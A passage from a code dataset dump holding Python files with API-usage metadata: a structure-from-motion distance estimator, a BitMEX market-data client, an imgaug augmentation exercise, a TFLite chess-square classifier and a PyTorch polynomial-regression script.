"applicationManager.models.Application", "line_number": 808, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 812, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 815, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 816, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 816, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 823, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 823, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 823, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 823, "usage_type": "name"}, {"api_name": 
"applicationManager.models.Application.objects.get", "line_number": 824, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 824, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 824, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 837, "usage_type": "call"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 837, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 837, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 838, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 838, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 839, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 839, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.all", "line_number": 841, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 841, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 841, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 846, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 846, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 893, "usage_type": "call"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 893, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 893, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 894, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 894, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 895, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application.objects.all", "line_number": 896, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 896, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 896, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 899, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 899, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 902, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 902, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 906, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 906, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 906, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 906, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 907, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 907, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 907, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 916, "usage_type": "call"}, 
{"api_name": "os.path.isdir", "line_number": 917, "usage_type": "call"}, {"api_name": "os.path", "line_number": 917, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 918, "usage_type": "call"}, {"api_name": "os.path", "line_number": 918, "usage_type": "attribute"}, {"api_name": "django.urls.path", "line_number": 928, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 936, "usage_type": "argument"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 1060, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 1060, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 1060, "usage_type": "name"}]} +{"seq_id": "233951673", "text": "import numpy as np\nfrom scipy.spatial import distance\n\ndef calc_TFL_dist(prev_container, curr_container, focal, pp):\n norm_prev_pts, norm_curr_pts, R, foe, tZ = prepare_3D_data(prev_container, curr_container, focal, pp)\n if(abs(tZ) < 10e-6):\n print('tz = ', tZ)\n elif (norm_prev_pts.size == 0):\n print('no prev points')\n elif (norm_prev_pts.size == 0):\n print('no curr points')\n else:\n curr_container.corresponding_ind, curr_container.traffic_lights_3d_location, curr_container.valid = calc_3D_data(norm_prev_pts, norm_curr_pts, R, foe, tZ)\n return curr_container\n\ndef prepare_3D_data(prev_container, curr_container, focal, pp):\n norm_prev_pts = normalize(prev_container.traffic_light, focal, pp)\n norm_curr_pts = normalize(curr_container.traffic_light, focal, pp)\n R, foe, tZ = decompose(np.array(curr_container.EM))\n return norm_prev_pts, norm_curr_pts, R, foe, tZ\n\ndef calc_3D_data(norm_prev_pts, norm_curr_pts, R, foe, tZ):\n norm_rot_pts = rotate(norm_prev_pts, R)\n pts_3D = []\n corresponding_ind = []\n validVec = []\n for p_curr in norm_curr_pts:\n corresponding_p_ind, corresponding_p_rot = find_corresponding_points(p_curr, norm_rot_pts, foe)\n if corresponding_p_ind == None and corresponding_p_rot == None:\n break\n Z = calc_dist(p_curr, corresponding_p_rot, foe, tZ)\n valid = (Z > 0)\n if not valid:\n Z = 0\n validVec.append(valid)\n P = Z * np.array([p_curr[0], p_curr[1], 1])\n pts_3D.append((P[0], P[1], P[2]))\n corresponding_ind.append(corresponding_p_ind)\n return corresponding_ind, np.array(pts_3D), validVec\n\ndef normalize(pts, focal, pp):\n # transform pixels into normalized pixels using the focal length and principle point\n # 𝑥 ≔ (𝑥 − 𝑝𝑝_𝑥) / 𝑓 =𝑋/𝑍\n res = list()\n for point in pts:\n res.append([point[0] - pp[0], point[1] - pp[1]] / focal)\n return np.array(res)\n\n \ndef unnormalize(pts, focal, pp):\n # transform normalized pixels into pixels using the focal length and principle point\n # x ≔ (𝑥 * f + 𝑝𝑝_𝑥) \n res = list()\n for point in pts:\n res.append([point[0] * focal + pp[0], point[1] * focal + pp[1]])\n return np.array(res)\n\ndef decompose(EM):\n # extract R, foe and tZ from the Ego Motion\n R = EM[:3,:3]\n tZ = EM[2,3]\n #foe = (e_x, e_y) = (p_x/t_z, p_y/t_z)\n foe = np.array([EM[0, 3], EM[1, 3]])/tZ\n return R, foe, tZ\n\ndef rotate(pts, R):\n # rotate the points - pts using R\n # ((𝑥 ̃_𝑟, 𝑦 ̃_𝑟, 1)) = 1 / 𝑍_𝑟 * 𝑷_𝒓 = 𝑍_𝑝 / 𝑍_𝑟 * R((𝑥_𝑝, 𝑦_𝑝, 1)) ≔ 𝑍_𝑝 / 𝑍_𝑟 * ((a,𝑏,𝑐))\n res = list()\n for point in pts:\n point_rotate = R.dot(np.array([point[0], point[1], 1]))\n # 𝑥_𝑟 = 𝑎/𝑐\n # 𝑦_𝑟 = 𝑏/𝑐 \n point_rotate = (point_rotate[0], point_rotate[1])/point_rotate[2]\n res.append(point_rotate)\n return np.array(res)\n\ndef find_corresponding_points(p, norm_pts_rot, foe):\n # 
compute the epipolar line between p and foe\n # run over all norm_pts_rot and find the one closest to the epipolar line\n # return the closest point and its index\n # 𝑦 = 𝑚𝑥 + 𝑛 =((𝑒_𝑦 − 𝑦) / (𝑒_𝑥 − 𝑥)) * 𝑥 + (𝑦*𝑒_𝑥 − 𝑒_𝑦*𝑥) / (𝑒_𝑥 − 𝑥)\n m = (foe[1] - p[1]) / (foe[0] - p[0])\n n = ((p[1] * foe[0]) - (foe[1] * p[0])) / (foe[0] - p[0])\n # the distance of p from 𝑙 is: 𝑑= abs((𝑚𝑥 + 𝑛 − 𝑦) / sqrt(𝑚^2 + 1))\n denominator = np.sqrt(m * m + 1)\n min_distance = abs(m * norm_pts_rot[0][0] + n - norm_pts_rot[0][1]) / denominator\n closest_index = 0\n closest_point = norm_pts_rot[0]\n for index, point in enumerate(norm_pts_rot):\n curr_distance = abs(m * point[0] + n - point[1]) / denominator\n if curr_distance < min_distance:\n min_distance = curr_distance\n closest_index = index\n closest_point = point\n\n # if distance.euclidean(closest_point, p) > 75:\n # return None, None\n return closest_index, closest_point\n\n\ndef calc_dist(p_curr, p_rot, foe, tZ):\n # calculate the distance of p_curr using x_curr, x_rot, foe_x and tZ\n # calculate the distance of p_curr using y_curr, y_rot, foe_y and tZ\n # combine the two estimations and return estimated Z\n\n # 𝒁 = (𝒕_𝒁 ∙ (𝒆_𝒙 − 𝑥_𝑟)) / (𝑥_𝑐 − 𝑥_𝑟)\n z_x = (tZ * (foe[0] - p_rot[0])) / (p_curr[0] - p_rot[0])\n\n # 𝒁 = (𝒕_𝒁 ∙ (𝒆_y − y_𝑟)) / (y_𝑐 − y_𝑟)\n z_y = (tZ * (foe[1] - p_rot[1])) / (p_curr[1] - p_rot[1])\n\n Z_x_w = abs(p_curr[0] - p_rot[0])\n Z_y_w = abs(p_curr[1] - p_rot[1])\n\n sum_w = Z_x_w + Z_y_w\n if (Z_x_w + Z_y_w) == 0:\n return 0\n Z_x_w /= sum_w\n Z_y_w /= sum_w\n Z = Z_x_w * z_x + Z_y_w * z_y\n\n return Z\n\n", "sub_path": "phase_3/SFM.py", "file_name": "SFM.py", "file_ext": "py", "file_size_in_byte": 4898, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 86, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 87, "usage_type": "name"}, {"api_name": "scipy.spatial.distance", "line_number": 92, "usage_type": "name"}, {"api_name": "scipy.spatial.distance", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "3805558", "text": "from bitmex_ws import Bitmex_WS\nfrom exchange import Exchange\nfrom dateutil import parser\nimport traceback\nimport datetime\nimport requests\n\n\nclass Bitmex(Exchange):\n \"\"\"BitMEX exchange model\"\"\"\n\n MAX_BARS_PER_REQUEST = 750\n BASE_URL = \"https://www.bitmex.com/api/v1\"\n BARS_URL = \"/trade/bucketed?binSize=\"\n # WS_URL = \"wss://testnet.bitmex.com/realtime\"\n WS_URL = \"wss://www.bitmex.com/realtime\"\n TIMESTAMP_FORMAT = '%Y-%m-%d%H:%M:%S.%f'\n\n def __init__(self, logger):\n super()\n self.logger = logger\n self.name = \"BitMEX\"\n self.symbols = [\"XBTUSD\", \"ETHUSD\"]\n self.channels = [\"trade\"] # , \"orderBookL2\"\n self.origin_tss = {\"XBTUSD\": 1483228800, \"ETHUSD\": 1533200520}\n self.api_key = None\n self.api_secret = None\n\n # only ever stores the most recent minutes bars, not persistent\n self.bars = {}\n\n #
connect to websocket\n self.ws = Bitmex_WS(\n self.logger, self.symbols, self.channels, self.WS_URL,\n self.api_key, self.api_secret)\n if not self.ws.ws.sock.connected:\n self.logger.debug(\"Failed to to connect to BitMEX websocket.\")\n\n def parse_ticks(self):\n if not self.ws.ws:\n self.logger.debug(\"BitMEX websocket disconnected.\")\n else:\n all_ticks = self.ws.get_ticks()\n target_minute = datetime.datetime.utcnow().minute - 1\n ticks_target_minute = []\n tcount = 0\n\n # search from end of tick list to grab newest ticks first\n for i in reversed(all_ticks):\n try:\n ts = i['timestamp']\n if type(ts) is not datetime.datetime:\n ts = parser.parse(ts)\n except Exception:\n self.logger.debug(traceback.format_exc())\n # scrape prev minutes ticks\n if ts.minute == target_minute:\n ticks_target_minute.append(i)\n ticks_target_minute[tcount]['timestamp'] = ts\n tcount += 1\n # store the previous-to-target bar's last\n # traded price to use as the open price for target bar\n if ts.minute == target_minute - 1:\n ticks_target_minute.append(i)\n ticks_target_minute[tcount]['timestamp'] = ts\n break\n ticks_target_minute.reverse()\n\n # reset bar dict ready for new bars\n self.bars = {i: [] for i in self.symbols}\n\n # build 1 min bars for each symbol\n for symbol in self.symbols:\n ticks = [\n i for i in ticks_target_minute if i['symbol'] == symbol]\n bar = self.build_OHLCV(ticks, symbol)\n self.bars[symbol].append(bar)\n # self.logger.debug(bar)\n\n def get_bars_in_period(self, symbol, start_time, total):\n \"\"\"Returns specified amount of 1 min bars starting from start_time.\n E.g get_bars_in_period(\"XBTUSD\", 1562971900, 100)\"\"\"\n\n if total >= self.MAX_BARS_PER_REQUEST:\n total = self.MAX_BARS_PER_REQUEST\n\n # convert epoch timestamp to ISO 8601\n start = datetime.datetime.utcfromtimestamp(start_time).isoformat()\n timeframe = \"1m\"\n\n # request url string\n payload = (\n f\"{self.BASE_URL}{self.BARS_URL}{timeframe}&\"\n f\"symbol={symbol}&filter=&count={total}&\"\n f\"startTime={start}&reverse=false\")\n bars_to_parse = requests.get(payload).json()\n\n # store only required values (OHLCV) and convert timestamp to epoch\n new_bars = []\n for bar in bars_to_parse:\n new_bars.append({\n 'symbol': symbol,\n 'timestamp': int(parser.parse(bar['timestamp']).timestamp()),\n 'open': bar['open'],\n 'high': bar['high'],\n 'low': bar['low'],\n 'close': bar['close'],\n 'volume': bar['volume']})\n\n return new_bars\n\n def get_origin_timestamp(self, symbol: str):\n \"\"\"Return millisecond timestamp of first available 1 min bar. 
If the\n timestamp is stored, return that, otherwise poll the exchange.\"\"\"\n\n if self.origin_tss[symbol] is not None:\n return self.origin_tss[symbol]\n else:\n payload = (\n f\"{self.BASE_URL}{self.BARS_URL}1m&symbol={symbol}&filter=&\"\n f\"count=1&startTime=&reverse=false\")\n\n response = requests.get(payload).json()[0]['timestamp']\n\n return int(parser.parse(response).timestamp())\n", "sub_path": "bitmex.py", "file_name": "bitmex.py", "file_ext": "py", "file_size_in_byte": 4680, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "exchange.Exchange", "line_number": 9, "usage_type": "name"}, {"api_name": "bitmex_ws.Bitmex_WS", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 53, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 53, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 96, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 103, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 103, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 123, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 125, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 125, "usage_type": "name"}]} +{"seq_id": "430008966", "text": "'''\nStart time: 20:40\nEnd time: 23:40\n\n1) Add two new data augmentation techniques that are not currently used in CreateSamples.py.\nPaste only the code for that part separately into this file (Q3.py).\n\n2) Put 5 sample images generated as the output of (1) into the AI/ folder.\nAttach images that clearly show the newly added augmentations.\n'''\n\nimport random\n\ndef random_crop(img, mask, width, height):\n assert img.shape[0] >= height\n assert img.shape[1] >= width\n assert img.shape[0] == mask.shape[0]\n assert img.shape[1] == mask.shape[1]\n x = random.randint(0, img.shape[1] - width)\n y = random.randint(0, img.shape[0] - height)\n img = img[y:y+height, x:x+width]\n mask = mask[y:y+height, x:x+width]\n return img, mask\n\nimport numpy as np\nimport imgaug.augmenters as iaa\n\ndef load_batch(batch_idx):\n # dummy function, implement this\n # Return a numpy array of shape (N, height, width, #channels)\n # or a list of (height, width, #channels) arrays (may have different image\n # sizes).\n # Images should be in RGB for colorspace augmentations.\n # (cv2.imread() returns BGR!)\n # Images should usually be in uint8 with values from 0-255.\n return np.zeros((128, 32, 32, 3), dtype=np.uint8) + (batch_idx % 255)\n\ndef train_on_images(images):\n # dummy function, implement this\n pass\n\n
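# Example (illustrative sketch, not part of the original file): two simple numpy-only\n# augmentations in the same style as random_crop above; img is assumed to be a\n# (H, W, C) uint8 array and mask a (H, W) array.\ndef random_hflip(img, mask, p=0.5):\n if random.random() < p:\n img = img[:, ::-1]\n mask = mask[:, ::-1]\n return img, mask\n\ndef random_gaussian_noise(img, sigma=10.0):\n noise = np.random.normal(0.0, sigma, img.shape)\n return np.clip(img.astype(np.float64) + noise, 0, 255).astype(np.uint8)\n\n# Pipeline:\n# (1) Crop images from each side by 1-16px, do not resize the results\n# images back to the input size. 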
Keep them at the cropped size.\n# (2) Horizontally flip 50% of the images.\n# (3) Blur images using a gaussian kernel with sigma between 0.0 and 3.0.\nseq = iaa.Sequential([\n iaa.Crop(px=(1, 16), keep_size=False),\n iaa.Fliplr(0.5),\n iaa.GaussianBlur(sigma=(0, 3.0))\n])\n\nfor batch_idx in range(100):\n images = load_batch(batch_idx)\n images_aug = seq(images=images) # done by the library\n train_on_images(images_aug)", "sub_path": "AI/Q3.py", "file_name": "Q3.py", "file_ext": "py", "file_size_in_byte": 2013, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "random.random.randint", "line_number": 19, "usage_type": "call"}, {"api_name": "random.random", "line_number": 19, "usage_type": "name"}, {"api_name": "random.random.randint", "line_number": 20, "usage_type": "call"}, {"api_name": "random.random", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 36, "usage_type": "attribute"}, {"api_name": "imgaug.augmenters.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 47, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Crop", "line_number": 48, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 48, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Fliplr", "line_number": 49, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 49, "usage_type": "name"}, {"api_name": "imgaug.augmenters.GaussianBlur", "line_number": 50, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "606938316", "text": "import numpy as np\nimport tflite_runtime.interpreter as tflite\n\nclass TfLiteModel:\n def __init__(self):\n self.interpreter = tflite.Interpreter(model_path=\"/zugzwang/training/model.tflite\")\n self.interpreter.allocate_tensors()\n \n self.input_details = self.interpreter.get_input_details()\n self.output_details = self.interpreter.get_output_details()\n \n print(self.input_details[0]['dtype'])\n self.count = self.input_details[0]['shape'][0] # Only 1 image to be input\n self.height = self.input_details[0]['shape'][1]\n self.width = self.input_details[0]['shape'][2]\n self.depth = self.input_details[0]['shape'][3]\n print(\"Expected input count (N) = \" + str(self.count))\n print(\"Expected input height (H) = \" + str(self.height))\n print(\"Expected input width (W) = \" + str(self.width))\n print(\"Expected input depth (D) = \" + str(self.depth))\n\n print(self.output_details[0]['dtype'])\n self.rows = self.output_details[0]['shape'][0]\n self.cols = self.output_details[0]['shape'][1]\n print(\"Expected output rows = \" + str(self.rows))\n print(\"Expected output cols = \" + str(self.cols))\n\n def classifySquare(self, one_square):\n # Infer piece color in provided Chess square\n self.interpreter.set_tensor(self.input_details[0]['index'], one_square)\n self.interpreter.invoke()\n softmax_output = self.interpreter.get_tensor(self.output_details[0]['index'])\n softmax_output = np.round(np.squeeze(softmax_output))\n\n # Map neural network softmax output to corresponding class\n if softmax_output[0] == 1:\n prediction = -1 # black\n elif softmax_output[1] == 1:\n prediction = 0 # empty\n elif softmax_output[2] == 1:\n prediction = 1 # white\n\n return prediction", "sub_path": "modules/tflite_model.py", "file_name": "tflite_model.py", "file_ext": "py", 
"file_size_in_byte": 1889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tflite_runtime.interpreter.Interpreter", "line_number": 6, "usage_type": "call"}, {"api_name": "tflite_runtime.interpreter", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "193974437", "text": "# Design out model (input,output size,forward pass)\n# Construct loss and optimizer\n# Training loop\n# - forward pass - compute prediction\n# - backward pass - gradients\n# - Update weights\n\nimport torch as torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nX=torch.tensor([-1.67245526,-2.36540279,-2.14724263,1.40539096,1.24297767,-1.71043904,2.31579097,2.40479939,-2.22112823], dtype=torch.float32)\nY=torch.tensor([-18.56122168, -24.99658931, -24.41907817, -2.688209,\n -1.54725306, -19.18190097, 1.74117419,\n 3.97703338, -24.80977847], dtype=torch.float32)\nw1 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw2 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw3 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw4 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw5 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\n\n\n\"\"\" print('w0 = {} w1 = {} w2 = {} w3 = {} w4 = {}'.format(w0, w1, w2, w3, w4)) \"\"\"\n\n# model prediction\ndef forward(x):\n result1 = w1 + 0 * x\n result2 = w1 + w2 * x\n result3 = w1 + w2 * x + w3 * (x ** 2)\n result4 = w1 + w2 * x + w3 * (x ** 2) + w4 * (x ** 3)\n result5 = w1 + w2 * x + w3 * (x ** 2) + w4 * (x ** 3) + w5 * (x ** 4)\n return result1, result2, result3, result4, result5\n \n# loss \nloss=nn.MSELoss()\n\n#gradient\nlearning_rate = 0.001\noptimizer1=torch.optim.SGD([w1],lr=learning_rate)\noptimizer2=torch.optim.SGD([w2],lr=learning_rate)\noptimizer3=torch.optim.SGD([w3],lr=learning_rate)\noptimizer4=torch.optim.SGD([w4],lr=learning_rate)\noptimizer5=torch.optim.SGD([w5],lr=learning_rate)\n\n#Training\n\nn=1000\nfor epoch in range(n):\n # model prediction\n result1, result2, result3, result4, result5 = forward(X)\n\n #loss and gradients\n l1=loss(Y,result1)\n l1.backward()\n g = w1.grad.item()\n optimizer1.step()\n optimizer1.zero_grad()\n\n l2=loss(Y,result2)\n l2.backward()\n optimizer2.step()\n optimizer2.zero_grad()\n\n l3=loss(Y,result3)\n l3.backward()\n optimizer3.step()\n optimizer3.zero_grad()\n\n l4=loss(Y,result4)\n l4.backward()\n optimizer4.step()\n optimizer4.zero_grad()\n\n l5=loss(Y,result5)\n l5.backward()\n optimizer5.step()\n optimizer5.zero_grad()\n \n #update weights\n\n \n if epoch %100 == 0:\n print(f'epoch {epoch+1}: w1 = {w1:.3f}, w2 = {w2:.3f}, w3 = {w3:.3f}, w4 = {w4:.3f}, w5 = {w5:.3f}') \n\n#print(predict1, predict2, predict3, predict4, predict5)\nprint(' result1 = {}\\n result2 = {}\\n result3 = {}\\n result4 = {}\\n result5 = {}'.format(result1, result2, result3, result4, result5))\n\n#Plotting\nplt.xlabel('X values')\nplt.ylabel('Y values/predicted values')\nf1 = plt.figure(1)\nplt.plot(X,Y,'ro')\nplt.plot(X,result1.data,'bo')\nplt.title('For n=1')\n\nf2 = plt.figure(2)\nplt.plot(X,Y,'ro')\nplt.plot(X,result2.data,'bo')\nplt.title('For n=2')\n\nf3 = plt.figure(3)\nplt.plot(X,Y,'ro')\nplt.plot(X,result3.data,'bo')\nplt.title('For n=3')\n\nf4 = plt.figure(4)\nplt.plot(X,Y,'ro')\nplt.plot(X,result4.data,'bo')\nplt.title('For n=4')\n\nf5 = 
plt.figure(5)\nplt.plot(X,Y,'ro')\nplt.plot(X,result5.data,'bo')\nplt.title('For n=5')\n\nplt.show()\n", "sub_path": "HW2/Assignment2-PartA.py", "file_name": "Assignment2-PartA.py", "file_ext": "py", "file_size_in_byte": 3151, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "torch.tensor", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": 